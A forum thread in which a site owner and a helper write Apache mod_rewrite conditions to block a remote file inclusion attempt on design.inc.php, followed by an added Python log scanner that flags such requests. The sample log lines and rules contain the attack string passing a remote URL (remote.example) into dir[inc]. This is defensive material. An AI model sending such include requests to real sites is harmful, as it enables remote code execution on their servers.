I am trying to trap a bad guy from trying to do an include injection. I have tried it two different ways and both failed. The first one was:
RewriteCond %{REQUEST_URI} ^/inc/design.inc.php?dir[inc]=http://*
and the second one:
RewriteCond %{HTTP_REQUEST} ^/inc/design.inc.php?dir[inc]=http://*
I thought for sure the second one would trap the block of code but I just got another attempt in my log file that got through. Any ideas would be greatly appreciated.
I am trapping my IP range and that is working, but the bad guy is using lots of bogus addresses that I cannot predict, so I have to wait for the attack to get the current ones he is using and add them to the list.
I am thinking that trapping the call is a far more efficient way to manage it as this string is ALWAYS used in the attack.
Kindest regards, mikesz
The list of envars for use in RewriteConds is given in the mod_rewrite documentation [httpd.apache.org].
THE_REQUEST will include the entire browser request, such as
GET /inc/design.inc.php?dir%5binc%5d=http%3a%2f%2f/page.htm HTTP/1.1
Therefore your pattern must take the HTTP method at the beginning into account, and you'll also have to match the hex-encoded characters in the query string.
To avoid that, you could use two RewriteConds, one for the %{REQUEST_URI} part and another for the %{QUERY_STRING}:
RewriteCond %{QUERY_STRING} ^dir\[inc\]=http://\*
RewriteCond %{REQUEST_URI} ^/inc/design\.inc\.php$
Jim
Both conditions produce the same result, separately or combined, which is exactly what I need to trap the bad guy before he even gets to my script, which has another trap just in case.
I had used the REQUEST_URI but was using the whole string including the QUERY_STRING (didn't know about that one... ) and it didn't work... BUT it DOES now!
Thanks very much, I appreciate it and the very quick response too!
regards, mikesz
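A log check for the attack string discussed in this thread, as an added example that is not from any of the posters: it percent-decodes each request before comparing, so the raw and hex-encoded forms of dir[inc]=http:// are both caught, and it returns the client addresses that sent them. The log lines, addresses and the remote.example host are constructed sample data, the function names are hypothetical, and the check is widened to https:// and ftp:// values as an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TARGET_PATH = "/inc/design.inc.php"   # script named in the thread
TARGET_PARAM = "dir[inc]"             # parameter named in the thread
# Assumption: any remote scheme in the parameter is a probe, not only http://
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Common/combined log format: client ident user [time] "METHOD target PROTO" ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "([A-Z]+) (\S+) [^"]*"')


def is_include_probe(target):
    """True if the request target calls TARGET_PATH with a remote URL in TARGET_PARAM."""
    parts = urlsplit(target)
    if unquote(parts.path) != TARGET_PATH:
        return False
    # parse_qsl percent-decodes names and values, so dir%5Binc%5D equals dir[inc]
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == TARGET_PARAM and REMOTE_SCHEME.match(value.strip()):
            return True
    return False


def scan(lines):
    """Return the sorted client addresses that sent at least one probe."""
    clients = set()
    for line in lines:
        m = LOG_LINE.match(line)
        if m and is_include_probe(m.group(3)):
            clients.add(m.group(1))
    return sorted(clients)


# Constructed sample log lines (documentation address ranges, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /inc/design.inc.php?dir[inc]=http://remote.example/x.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2007:10:00:05 +0000] "GET /inc/design.inc.php?dir%5Binc%5D=http%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2007:10:00:09 +0000] "GET /inc/design.inc.php?dir[inc]=templates/ HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Jan/2007:10:00:12 +0000] "GET /index.php?page=http://remote.example/ HTTP/1.1" 200 4096',
    '192.0.2.10 - - [01/Jan/2007:10:00:20 +0000] "POST /inc/design.inc.php?x=1&dir[inc]=HTTP://remote.example/y.txt HTTP/1.0" 403 199',
]

if __name__ == "__main__":
    for client in scan(SAMPLE_LOG):
        print(client)
```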